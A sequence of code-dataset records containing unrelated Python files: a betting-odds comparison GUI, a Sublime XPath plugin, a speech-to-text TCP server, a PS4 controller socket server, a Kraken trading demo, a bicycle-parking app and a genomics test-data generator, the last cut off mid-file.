judge_sign(name,list_n[str(game_set+'A')],list_n[str(game_set+'B_Odds')],list_b[str(game_set+'B')],list_b[str(game_set+'A_Odds')])\n else:\n judge_sign(name,list_n[str(game_set+'B')],list_n[str(game_set+'A_Odds')],list_b[str(game_set+'A')],list_b[str(game_set+'B_Odds')])\n else:err_list.append(str(name+'judge'))\n end =1\ndef compare(dfn,dfb):\n for i in dfb.index.values:\n global end\n end=0\n while end ==0:\n if i in dfn.index.values:\n for game_range in ['All_','Half_']:\n #讓分\n game_set =game_range+'R'\n # 0 _ 0 _ & else\n if str(dfn.loc[i,game_set+'A']) == '0':\n if pd.isna(dfb.loc[i,game_set+'A']):\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n elif str(dfb.loc[i,game_set+'A']) == '0':continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n # all & 0 _ 0 _ \n elif str(dfb.loc[i,game_set+'A']) == '0':\n if pd.isna(dfn.loc[i,game_set+'A']):\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n # na _ X _ & \n elif pd.isna(dfn.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'B']):continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_same')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'2_diff')\n # X _ na _ &\n elif pd.isna(dfn.loc[i,game_set+'B']):\n if pd.isna(dfb.loc[i,game_set+'A']):\n if pd.isna(dfb.loc[i,game_set+'B']):continue\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_diff')\n else:judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n else:err_list.append(str(i+'compare'))\n # 大小\n game_set = game_range+'D'\n judge(i,dfn.loc[i],dfb.loc[i],game_set,'1_same')\n end=1\ndef get_nine():\n try:\n labelframe1.destroy()\n labelframe2.destroy()\n labelframe3.destroy()\n except:None\n global err_list\n global big\n global fifup\n global nor\n err_list=[]\n big=[]\n fifup=[]\n nor=[]\n line = nineentry.get()\n df_nine = nine(line)\n df_ball = ball() \n nineentry.delete(0,10000)\n compare(df_nine,df_ball)\n data_in()\n \n\ndef data_in():\n global labelframe1\n labelframe1 = tk.LabelFrame(window, text='25% ~ 50%', height = 240, width=130)\n labelframe1.place(x=10,y=160)\n global labelframe2\n labelframe2 = tk.LabelFrame(window, text='50% ~ 100%', height = 240, width=130)\n labelframe2.place(x=140,y=160)\n global labelframe3\n labelframe3 = tk.LabelFrame(window, text=\"over 100%\", height = 240, width=130)\n labelframe3.place(x=270,y=160)\n\n for i in range(len(nor)):\n tk.Label(labelframe1, text = nor[i]).place(x=1,y=20*i)\n for i in range(len(fifup)):\n tk.Label(labelframe2, text = fifup[i]).place(x=1,y=20*i)\n for i in range(len(big)):\n bigls = tk.Label(labelframe3, text = big[i])\n bigls.place(x=1,y=20*i)\n for i in range(len(err_list)):\n tk.Label(window, text = err_list[i]).place(x=1,y=500+20*i)\n\n\n\nwindow = tk.Tk()\nwindow.title('打洞用')\nwindow.geometry('407x400')\nninelabel = tk.Label(window,text='九州 : ')\nninelabel.place(x=10,y=10)\nnineentry = tk.Entry(window,show=None)\nnineentry.place(x=50,y=12)\ntk.Button(window, text='開始找洞', width=15,\n height=2, command=get_nine).place(x=250,y=10)\n#tk.Button(window, text='clean', width=15,height=2, command=clean).place(x=250,y=50)\n\n\n\n\nwindow.mainloop()\n","sub_path":"0807/zm0807.py","file_name":"zm0807.py","file_ext":"py","file_size_in_byte":17841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"146430597","text":"import sublime\nimport sublime_plugin\nimport re\n\n\ndef buildPath(view, selection):\n path = ['']\n lines = []\n\n region = sublime.Region(0, selection.end())\n for line in view.lines(region):\n contents = view.substr(line)\n lines.append(contents)\n\n level = -1\n spaces = re.compile('^\\s+')\n for line in lines:\n space = spaces.findall(line)\n current = len(space[0]) if len(space) else 0\n node = re.sub(r'\\s*<\\??([\\w.]:)?([\\w\\-.]+)(\\s.)?>.*', r'\\2', line)\n if current == level:\n path.pop()\n path.append(node)\n elif current > level:\n path.append(node)\n level = current\n elif current < level:\n path.pop()\n level = current\n\n return path\n\n\ndef updateStatus(view):\n path = buildPath(view, view.sel()[0])\n response = '/'.join(path)\n sublime.status_message(response)\n\n\ndef isXML(view):\n ext = re.sub(\n r'.*\\.(\\w+)$',\n r'\\1',\n view.file_name()\n )\n return ext == 'xml'\n\n\nclass XpathCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n\n if isXML(view):\n response = ''\n selections = view.sel()\n for s, selection in enumerate(selections):\n path = buildPath(view, selection)\n response += '/'.join(path)\n if s != len(selections) - 1:\n response += '\\n'\n sublime.set_clipboard(response)\n\n\nclass XpathListener(sublime_plugin.EventListener):\n def on_text_command(self, view, command, args):\n if(isXML(view) and command == \"move\"):\n updateStatus(view)\n","sub_path":"xpath.py","file_name":"xpath.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369222666","text":"#import of the necessary modules and the API functions\nimport socket \nfrom speechText import speechtext as st\nfrom NLP import npl\n\n#declaration of the port and adress for the communication\nPORT = 8080\nSERVER = \"127.0.0.1\"\nADDR = (SERVER, PORT)\n\n#initiate the TCP-Socket connection\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\n#declaration of the start function which is listening for an connection and write received in working file\ndef start():\n\n print(\"[STARTING] Server is starting...\") \n server.listen() \n print(f\"[LISTENING] Server is listening on {ADDR}\") \n conn, addr = server.accept()\n with open('received.ogg','wb') as f:\n print(f\"Server is receiving data from {addr}\")\n while True:\n l = bytearray(conn.recv(1024))\n f.write(bytes(l))\n if not l: break\n\n#call of the start function\nstart()\n\nprint(\"Verarbeitung läuft...\")\n\n#call of the transcription function of the speechText-API\ntranscription = st() \nsplitedText = transcription.split(\"\\n\") #split transcriped text into array\nmyText = str(splitedText[2]) #read text part of array and save as string\nprint(myText) \n\nprint(\"Text wird Analysiert\") \n\n#call analysing function of naturalLanguageUnderstanding-API and save result\nresults = npl(myText)\n\n#start of an new TCP connection to send the results \nprint(\"[Reconnect] Server is opening ne connection...\") \nserver.listen() \nprint(f\"[LISTENING] Server is listening on {ADDR}\") \nconn, addr = server.accept()\nprint(addr)\n\n#declaration of sendAnswer function that sends answer to client and ends the connection\ndef sendAnswer(myText):\n \n print('Sending answer')\n msg = bytearray(myText, 'utf-8')\n print(msg)\n conn.sendall(msg)\n print('Send completed')\n conn.close()\n\nsendAnswer(myText)\n","sub_path":"TCP-Server.py","file_name":"TCP-Server.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120543059","text":"'''\nCreated on 03.12.2013\n\n@author: Arne\n'''\nfrom Element import Element\nfrom Parameter import Parameter\n\n\nclass SimpleChipGrid(Element):\n '''\n classdocs\n '''\n\n def __init__(self,cell):\n '''\n Constructor\n \n draw two resonator cose to each other\n '''\n Element.__init__(self,cell)\n \n self.chipDistance = Parameter('chipDistance','distance to keep between the different chips')\n self.rowNumber = Parameter('rowNumber','number of rows')\n self.chipDistance.value = 100\n \n self.parameters.append(self.chipDistance)\n \n # create List of possible chips\n \n \n ","sub_path":"Designs/src_gdspy041/des_131101_CMPII/ChipGrid.py","file_name":"ChipGrid.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"582535436","text":"# Copyright (C) 2011 Computation Institute\n#\n__author__ = 'vas@ci.uchicago.edu (Vas Vasiliadis)'\n\nimport os\nimport logging as log\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\n\nimport models\nimport appglobals as globals\n\n#\n# Sets application settings\n#\nport = os.environ.get('SERVER_PORT')\nif port and port != '80':\n _HOST_NAME = '%s:%s' % (os.environ.get('SERVER_NAME'), port)\nelse:\n _HOST_NAME = os.environ.get('SERVER_NAME')\n \n_APP_VERSION = os.environ['CURRENT_VERSION_ID']\n\n#\n# Sets login/logout URL based on user's authentication status\n#\n# Returns: dictionary that is passed to page templates\n# 'user' is the currently logged-in user object\n# 'loginout_url' is the URL to redirect to for login/logout\n# 'debug\" is passed so that templates can be modified dynamically\n# 'isadmin\" denotes whether the user is logged in as an application administrator\n#\ndef SetLoginValues(user=None, url=\"/\"):\n user = users.get_current_user()\n admin = users.is_current_user_admin()\n if not user:\n loginout = users.create_login_url(url)\n else:\n loginout = users.create_logout_url(\"/\")\n return {'user':users.get_current_user(), 'loginout_url':loginout, 'debug':globals._APP_DEBUG, 'isadmin':admin, 'app_version':_APP_VERSION}\n\n#\n# Gets the specified user's profile; f no user is specified, \n# gets the profile of the currently logged in user\n#\ndef GetUserProfile(user=None):\n if not user:\n user = users.get_current_user()\n \n return db.Query(models.UserProfile).filter('google_user_id = ', user.user_id()).fetch(1)[0]\n\ndef GetGoogleID(user=None):\n if not user:\n user = users.get_current_user()\n\n return user.user_id()\n\ndef SendEmail(recipient, subject=\"Globus Online Usage Tracking\", body='', copied=None, blindcopied=None, sender=None):\n message = mail.EmailMessage()\n # TODO: Validate e-mail addresses to protect against hack\n if sender is None:\n message.sender = \"GO Usage Tracker <%s>\" % globals._ADMIN_NOTIFY_EMAIL\n else:\n message.sender = sender\n \n if mail.is_email_valid(recipient):\n message.to = recipient\n message.subject = subject\n message.body = body\n if copied is not None:\n message.cc = copied\n if blindcopied is not None:\n message.bcc = blindcopied\n \n try:\n message.send()\n log.info('Mail: Sent to ' + recipient)\n return\n except:\n pass\n \n log.info('Mail: Send to ' + recipient + ' failed')\n return\n\ndef printDict(aDict, br='
    ', keyAlign='left', keyPrefix='', keySuffix='', valuePrefix='', valueSuffix='', leftMargin=0, indent=0 ):\n output = []\n\n # Stringify keys and values\n keys = [str(x) for x in aDict.keys()]\n values = [str(x) for x in aDict.values()] \n\n # Set keys length to length of longest key string\n maxKeyLen = max([len(str(x)) for x in keys])\n\n for i in range(len(keys)):\n # Adjust key width\n k = {keyAlign=='left' : str(keys[i]).ljust(maxKeyLen),\n keyAlign=='right': str(keys[i]).rjust(maxKeyLen)}[1] \n v = values[i]\n output.append(' '*indent + '%s%s%s: %s%s%s%s' %(keyPrefix, k, keySuffix, valuePrefix, v, valueSuffix, br))\n\n if leftMargin:\n output = [' '*leftMargin + x for x in output]\n \n return '%s' % ''.join(output)\n\ndef printList(aList, br='
    ', prefix='', suffix='', leftMargin=0, indent=0):\n output = [] \n for item in aList:\n if leftMargin:\n item = ' '*leftMargin + item\n output.append(' '*indent + '%s%s%s%s' %(prefix, item, suffix, br))\n return '%s' % ''.join(output)","sub_path":"apputils.py","file_name":"apputils.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574670615","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 7 10:18:45 2019\r\n\r\n@author: DEAGOSTINOJ\r\n\"\"\"\r\n\r\nfpOut = open('C:\\Temp\\DeviceList_2.txt','a') \r\n#fpOut.write('Test\\n') \r\n \r\n \r\nfilepath = 'C:\\Temp\\DeviceList.txt' \r\nwith open(filepath) as fp: \r\n line = fp.readline()\r\n cnt = 1\r\n while line:\r\n# print(\"Line {}: {}\".format(cnt, line.strip()))\r\n print(\"{}'{},'\".format(cnt, line.strip())) \r\n fpOut.write(\"'{}',\".format(line.strip()))\r\n line = fp.readline()\r\n cnt += 1\r\n \r\n \r\nfpOut.close() ","sub_path":"FileMan.py","file_name":"FileMan.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159613390","text":"import os\nimport pprint\nimport pygame\nimport json \nimport pprint\nimport socket\nimport sys\n\nclass PS4Controller(object):\n \"\"\"Class representing the PS4 controller. Pretty straightforward functionality.\"\"\"\n\n controller = None\n axis_data = {0: 0.0, 1: 0.0, 2: 0.0, 3: 0.0, 4: 0.0}\n button_data = None\n hat_data = None\n\n def init(self):\n \"\"\"Initialize the joystick components\"\"\"\n \n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n\n def listen(self, ip, port):\n \"\"\"Listen for events to happen\"\"\"\n\n s = socket.socket() \n print (\"Socket successfully created\")\n\n s.bind((ip, port)) \n print (\"socket binded to %s\" %(port)) \n s.listen(5) \n print (\"socket is listening\") \n \n c, addr = s.accept() \n print ('Got connection from', addr) \n\n if not self.axis_data:\n self.axis_data = {}\n\n if not self.button_data:\n self.button_data = {}\n for i in range(self.controller.get_numbuttons()):\n self.button_data[i] = False\n\n if not self.hat_data:\n self.hat_data = {}\n for i in range(self.controller.get_numhats()):\n self.hat_data[i] = (0, 0)\n\n try: \n while True:\n for event in pygame.event.get():\n if event.type == pygame.JOYAXISMOTION:\n self.axis_data[event.axis] = round(event.value,3)\n elif event.type == pygame.JOYBUTTONDOWN:\n self.button_data[event.button] = True\n elif event.type == pygame.JOYBUTTONUP:\n self.button_data[event.button] = False\n elif event.type == pygame.JOYHATMOTION:\n self.hat_data[event.hat] = event.value\n\n # Insert your code on what you would like to happen for each event here!\n # In the current setup, I have the state simply printing out to the screen.\n \n os.system('clear')\n pprint.pprint(self.button_data)\n pprint.pprint(self.axis_data, width=1)\n print(type(self.hat_data))\n pprint.pprint(self.hat_data)\n\n data_byte = json.dumps(self.axis_data).encode('utf-8')\n c.sendall(data_byte)\n data = c.recv(4).strip()\n print(data)\n # return self.axis_data , self.hat_data, self.button_data\n except Exception as e:\n print(e)\n print('Closing Connection')\n c.close() \n\nif __name__ == \"__main__\":\n ps4 = PS4Controller()\n ps4.init()\n ps4.listen(sys.argv[1], int(sys.argv[2]))\n","sub_path":"client_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"517517451","text":"\"\"\"\n@author: Luis Fernando Lara Tobar\n@author: Peter Corke\n@author: Samuel Drew\n\"\"\"\n\nfrom roboticstoolbox import DHRobot, RevoluteDH\nimport numpy as np\n\n\nclass Planar3(DHRobot):\n \"\"\"\n Create a planar 3 link robot\n \"\"\"\n\n def __init__(self):\n\n L = [RevoluteDH(a=1),\n RevoluteDH(a=1),\n RevoluteDH(a=1)]\n\n super().__init__(L, name='Planar 3 link', keywords=('planar',))\n self.addconfiguration(\"qz\", [0, 0, 0])\n\nif __name__ == '__main__':\n\n robot = Planar3()\n print(robot)","sub_path":"roboticstoolbox/models/DH/Planar3.py","file_name":"Planar3.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267232353","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\nKraken 模块使用演示\n\n为了在订单薄买盘提前埋伏订单,在 `XBT/USD` 订单薄盘口距离10美金的位置挂买单,数量量为1。\n随着订单薄盘口价格不断变化,需要将价格已经偏离的订单取消,再重新挂单,使订单始终保持距离盘口价差为 `10 ± 1` 美金。\n这里设置了缓冲价差为 `1` 美金,即只要盘口价格变化在 `± 1` 内,都不必撤单之后重新挂单,这样设置的目的是尽量减少挂撤单的次数,\n因为交易所开放的交易接口有调用频率的限制,如果调用太过频繁超过了限制可能会报错。\n\"\"\"\n\nimport sys\n\nfrom quant import const\nfrom quant.utils import tools\nfrom quant.utils import logger\nfrom quant.config import config\nfrom quant.market import Market\nfrom quant.trade import Trade\nfrom quant.order import Order\nfrom quant.market import Orderbook\nfrom quant.order import ORDER_ACTION_BUY, ORDER_STATUS_FAILED, ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED\n\n\nclass MyStrategy:\n\n def __init__(self):\n \"\"\" 初始化\n \"\"\"\n self.strategy = config.strategy\n self.platform = const.KRAKEN\n self.account = config.accounts[0][\"account\"]\n self.access_key = config.accounts[0][\"access_key\"]\n self.secret_key = config.accounts[0][\"secret_key\"]\n self.symbol = config.symbol\n\n self.order_no = None # 创建订单的id\n self.create_order_price = \"0.0\" # 创建订单的价格\n\n # 交易模块\n cc = {\n \"strategy\": self.strategy,\n \"platform\": self.platform,\n \"symbol\": self.symbol,\n \"account\": self.account,\n \"access_key\": self.access_key,\n \"secret_key\": self.secret_key,\n \"order_update_callback\": self.on_event_order_update\n }\n self.trader = Trade(**cc)\n\n # 订阅行情\n Market(const.MARKET_TYPE_ORDERBOOK, self.platform, self.symbol, self.on_event_orderbook_update)\n\n async def on_event_orderbook_update(self, orderbook: Orderbook):\n \"\"\" 订单薄更新\n \"\"\"\n logger.debug(\"orderbook:\", orderbook, caller=self)\n ask1_price = float(orderbook.asks[0][0]) # 卖一价格\n bid1_price = float(orderbook.bids[0][0]) # 买一价格\n price = (ask1_price + bid1_price) / 2 # 为了方便,这里假设盘口价格为 卖一 和 买一 的平均值\n\n # 判断是否需要撤单\n if self.order_no:\n if (self.create_order_price + 10 > price - 1) and (self.create_order_price + 10 < price + 1):\n return\n _, error = await self.trader.revoke_order(self.order_no)\n if error:\n logger.error(\"revoke order error! error:\", error, caller=self)\n return\n self.order_no = None\n logger.info(\"revoke order:\", self.order_no, caller=self)\n\n # 创建新订单\n new_price = price + 10\n quantity = \"1\" # 委托数量为1\n action = ORDER_ACTION_BUY\n new_price = tools.float_to_str(new_price) # 将价格转换为字符串,保持精度\n quantity = tools.float_to_str(quantity) # 将数量转换为字符串,保持精度\n order_no, error = await self.trader.create_order(action, new_price, quantity)\n if error:\n logger.error(\"create order error! error:\", error, caller=self)\n return\n self.order_no = order_no\n self.create_order_price = float(new_price)\n logger.info(\"create new order:\", order_no, caller=self)\n\n async def on_event_order_update(self, order: Order):\n \"\"\" 订单状态更新\n \"\"\"\n logger.info(\"order update:\", order, caller=self)\n\n # 如果订单失败、订单取消、订单完成交易\n if order.status in [ORDER_STATUS_FAILED, ORDER_STATUS_CANCELED, ORDER_STATUS_FILLED]:\n self.order_no = None\n\n\ndef main():\n if len(sys.argv) > 1:\n config_file = sys.argv[1]\n else:\n config_file = None\n\n from quant.quant import quant\n quant.initialize(config_file)\n MyStrategy()\n quant.start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"example/kraken/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513215375","text":"from tkinter import *\r\nimport json\r\nimport random\r\nimport datetime\r\nfrom tkinter.messagebox import showinfo\r\nimport sys\r\n\r\nchipkaartnummer = \"\"\r\nname = \"\"\r\ncounter = 0\r\ncounter1 = 0\r\ncounter2 = 0\r\nID = \"\"\r\ndef backToMenu():\r\n root.deiconify()\r\n#\r\n# def closeTab():\r\n# window.withdraw()\r\n\r\ndef loadJSON():\r\n global database\r\n file = (open('database.txt', 'r')).read()\r\n database = json.loads(file)\r\n\r\ndef writeJSON():\r\n global database\r\n text = json.dumps(database, sort_keys=True, indent=4)\r\n with open('database.txt', 'w') as file:\r\n file.write(text)\r\n\r\ndef randomID():\r\n global database\r\n number = ''\r\n for loop in range(10):\r\n number += str(random.randrange(0,9))\r\n if number in database:\r\n return randomID()\r\n else:\r\n return number\r\n#\r\n# def return_entry():\r\n# \"\"\"Gets and prints the content of the entry\"\"\"\r\n# content = entry.get()\r\n# print(content)\r\n\r\nentryb1 = StringVar\r\n\r\ndef register():\r\n global database\r\n loadJSON()\r\n # window = Toplevel(root)\r\n\r\n def closeTab():\r\n window.withdraw()\r\n\r\n def nameAsk():\r\n window = Toplevel(root)\r\n Label(window, text=\"Wat is uw volledige naam? \").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n entry1 = Entry(window, textvariable=entryb1)\r\n entry1.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n # Connect the entry with the return button\r\n # entry.bind('', entry.get())\r\n\r\n def callback():\r\n print(entry1.get())\r\n global name\r\n name = entry1.get()\r\n fietsCode()\r\n\r\n b1 = Button(window, text=\"continue\", command= lambda: callback())\r\n b1.pack()\r\n closeTab()\r\n\r\n def fietsCode():\r\n ovChip = chipkaartnummer\r\n database[ID] = {'naam' : name, 'aanwezig' : False, 'ovchip' : ovChip}\r\n showinfo(message='Het unieke nummer van jouw fiets is: ' + str(ID))\r\n window = Toplevel(root)\r\n\r\n def meteenStallen():\r\n database[ID]['aanwezig'] = True\r\n database[ID]['sinds'] = str(datetime.datetime.now())\r\n def back():\r\n backToMenu()\r\n back()\r\n\r\n\r\n Label(window, text=\"Wilt u uw fiets meteen stallen? \").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n b1 = Button(window, text=\"Ja\", command= lambda: meteenStallen())\r\n b1.pack(side=LEFT)\r\n\r\n b2 = Button(window, text=\"Nee\", command= lambda: backToMenu())\r\n b2.pack(side=RIGHT)\r\n writeJSON()\r\n\r\n\r\n if counter > 0:\r\n nameAsk()\r\n\r\n global counter\r\n counter += 1\r\n if counter1 <= 0:\r\n chipscan()\r\n ID = randomID()\r\n\r\ndef store():\r\n global database\r\n loadJSON()\r\n global counter\r\n\r\n window = Toplevel(root)\r\n Label(window, text=\"Geef het 10 cijferig nummer van jouw de fiets: \").pack()\r\n entry1 = Entry(window, textvariable=entryb1)\r\n entry1.pack()\r\n\r\n def callback():\r\n print(entry1.get())\r\n global ID\r\n ID = entry1.get()\r\n\r\n b1 = Button(window, text=\"continue\", command=callback())\r\n b1.pack()\r\n ID = input('Geef het 10 cijferig nummer van jouw de fiets: ')\r\n if ID not in database:\r\n showinfo(message='Deze fiets is niet bij ons bekend')\r\n elif database[ID]['aanwezig'] is True:\r\n showinfo(message='Deze fiets staat al in de stalling...')\r\n else:\r\n database[ID]['aanwezig'] = True\r\n database[ID]['sinds'] = str(datetime.datetime.now())\r\n writeJSON()\r\n\r\ndef pickup():\r\n global database\r\n loadJSON()\r\n ID = input('Geef het 10 cijferig nummer van de fiets die je wilt ophalen: ')\r\n if ID not in database:\r\n showinfo(message='Deze fiets is niet bij ons bekend')\r\n elif database[ID]['aanwezig'] is False:\r\n showinfo(message='Deze fiets staat niet in de stalling')\r\n else:\r\n ovChip = chipscan()\r\n if database[ID]['ovchip'] != ovChip:\r\n showinfo(message='Jij bent niet de eigenaar van deze fiets')\r\n else:\r\n database[ID]['aanwezig'] = False\r\n del database[ID]['sinds']\r\n showinfo(message='Je hebt je fiets opgehaald')\r\n writeJSON()\r\n\r\ndef count():\r\n global database\r\n loadJSON()\r\n count = 0\r\n for fiets in database:\r\n if database[fiets]['aanwezig'] is True:\r\n count += 1\r\n if count == 1:\r\n showinfo(message='Er staat op dit moment 1 fiets in de stalling')\r\n else:\r\n showinfo(message='Er staan op dit moment ' + str(count) + ' fietsen in de stalling')\r\n showinfo(message='Er zijn nog ' + str(500 - count) + ' plekken beschikbaar')\r\n\r\ndef chipscan():\r\n\r\n root.withdraw()\r\n #haalt root weg, terug krijgen is root.deiconify()\r\n global counter1\r\n counter1 += 1\r\n # counter1 is zodat ie niet nog een keer door bepaalde code loopt\r\n window = Toplevel(root)\r\n Label(window, text=\"Dit leest de ov-chipkaart scanner? \\n(voer hier een het getal van je ov chipkaart in zonder de spaties): \").pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n entry = Entry(window)\r\n entry.pack()\r\n\r\n def closeTab():\r\n window.withdraw()\r\n\r\n def callback1(): # geeft chipkaartnummer waarde van entry\r\n global chipkaartnummer\r\n chipkaartnummer = entry.get()\r\n\r\n if len(chipkaartnummer) == 16:\r\n try:\r\n int(chipkaartnummer)\r\n register()\r\n except:\r\n showinfo(message='U heeft geen getal ingevoerd')\r\n print(\"GEEN GETAL\") # is voor test\r\n chipscan()\r\n else:\r\n showinfo(message='De code was niet 16 tekens lang ')\r\n print(\"NIET LANG\") # is test\r\n # quit(window)\r\n chipscan()\r\n closeTab()\r\n\r\n b1 = Button(window, text=\"submit\", command= lambda: callback1())\r\n b1.pack()\r\n\r\nroot = Tk()\r\nnsBlue = '#002D72'\r\nnsYellow = '#FFC72C'\r\nroot.configure(bg=nsYellow)\r\n\r\nlabel = Label(master=root,\r\n text='Fietsenstalling',\r\n font =(\"Italic\",50),\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n width=15,\r\n height=2)\r\nlabel.pack()\r\n\r\nlabel1 = Label(master=root,\r\n text='Welkom bij de NS fietsenstalling. \\nSelecteer wat u wilt doen.',\r\n font =(\"Italic\",15),\r\n foreground=nsBlue,\r\n background=nsYellow)\r\nlabel1.pack()\r\n\r\nbutton = Button(master=root,\r\n text=\"Fiets registreren\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=register)\r\nbutton.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton2 = Button(master=root,\r\n text=\"Fiets stallen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=store)\r\nbutton2.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton3 = Button(master=root,\r\n text=\"Fiets ophalen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=pickup)\r\nbutton3.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nbutton4 = Button(master=root,\r\n text=\"Informatie opvragen\",\r\n foreground=nsBlue,\r\n background=nsYellow,\r\n command=count)\r\nbutton4.pack(ipady=5, ipadx=5, padx=2, pady=2)\r\n\r\nroot.mainloop()\r\n\r\n","sub_path":"PythonProject/test for entry 2.py","file_name":"test for entry 2.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104221072","text":"# If this is run as a script, then it makes a directory `test_data_files`\n# with all the test data files.\n# This is not indended to be run by the user.\n# It assumes samtools and minimap2 are installed.\n#\n# There's a separate commnd line task make_test_data. It copies the\n# Files directory, but then also edits the file `manifest.tsv` (used by the\n# nextflow joint genotype piepline), to put absolute paths in there.\n# Has to be done at run time because that's when we know the full path.\nimport copy\nimport os\nimport random\nimport subprocess\nimport pyfastaq\n\nfrom minos import utils\n\ndef _call_variants(ref, reads, out, mates=None):\n bam = f\"{out}.bam\"\n if mates is None:\n command = f\"minimap2 -a {ref} {reads}\"\n else:\n command = f\"minimap2 -x sr -a {ref} {reads} {mates}\"\n command += f\" | samtools sort -O BAM -o {bam}\"\n subprocess.check_output(command, shell=True)\n command = f\"samtools mpileup -ugf {ref} {bam} | bcftools call -vm -O v -o {out}.vcf\"\n subprocess.check_output(command, shell=True)\n subprocess.check_output(f\"samtools index {bam}\", shell=True)\n\n\ndef _make_test_data():\n random.seed(42)\n\n outdir = \"test_data_files\"\n os.mkdir(outdir)\n\n ref_fasta = os.path.join(outdir, \"ref.fa\")\n sample1_pre = os.path.join(outdir, \"sample1\")\n sample2_pre = os.path.join(outdir, \"sample2\")\n reads1_1 = f\"{sample1_pre}.reads_1.fastq.gz\"\n reads1_2 = f\"{sample1_pre}.reads_2.fastq.gz\"\n reads2 = f\"{sample2_pre}.reads.fastq.gz\"\n\n ref_seq = random.choices([\"A\", \"C\", \"G\", \"T\"], k=1000)\n mut_seq1 = copy.copy(ref_seq)\n mut_seq2 = copy.copy(ref_seq)\n\n ref_seq[199] = \"A\"\n mut_seq1[199] = \"C\"\n mut_seq2[199] = \"C\"\n\n ref_seq[399] = \"G\"\n mut_seq1[399] = \"A\"\n mut_seq2[399] = \"G\"\n\n ref_seq[599] = \"T\"\n mut_seq1[599] = \"T\"\n mut_seq2[599] = \"C\"\n\n with open(ref_fasta, \"w\") as f:\n print(\">ref\", \"\".join(ref_seq), sep=\"\\n\", file=f)\n\n mut_fasta1 = os.path.join(outdir, \"tmp.mut1.fa\")\n with open(mut_fasta1, \"w\") as f:\n print(\">m1\", \"\".join(mut_seq1), sep=\"\\n\", file=f)\n\n mut_fasta2 = os.path.join(outdir, \"tmp.mut2.fa\")\n with open(mut_fasta2, \"w\") as f:\n print(\">m2\", \"\".join(mut_seq2), sep=\"\\n\", file=f)\n\n subprocess.check_output(f\"fastaq to_perfect_reads {mut_fasta1} - 250 1 20 100 | fastaq deinterleave - {reads1_1} {reads1_2}\", shell=True)\n\n subprocess.check_output(f\"fastaq to_perfect_reads {mut_fasta2} {reads2} 250 1 20 100\", shell=True)\n\n call_variants(ref_fasta, reads1_1, sample1_pre, mates=reads1_2)\n call_variants(ref_fasta, reads2, sample2_pre)\n\n os.unlink(mut_fasta1)\n os.unlink(mut_fasta2)\n\n os.rename(f\"{sample1_pre}.vcf\", os.path.join(outdir, \"in.1.vcf\"))\n os.rename(f\"{sample2_pre}.vcf\", os.path.join(outdir, \"in.2.vcf\"))\n\n with open(os.path.join(outdir, \"manifest.tsv\"), \"w\") as f:\n print(\"name\\treads\\tvcf\", file=f)\n print(\"sample1\\tsample1.bam\\tin.1.vcf\", file=f)\n print(\"sample2\\tsample2.bam\\tin.2.vcf\", file=f)\n\n\ndef make_test_data_dir(outdir):\n if os.path.exists(outdir):\n raise Exception(f\"Output directory {outdir} already exists. Cannot continue\")\n this_file_dir = os.path.dirname(os.path.realpath(__file__))\n dir_to_copy = os.path.join(this_file_dir, \"test_data_files\")\n if not os.path.exists(dir_to_copy):\n raise Exception(f\"Error! Did not find test data files. Expected to find them here: {dir_to_copy}\")\n\n utils.syscall(f\"cp -rp {dir_to_copy} {outdir}\")\n\n # Need to fix the manifest file so that the filenames are 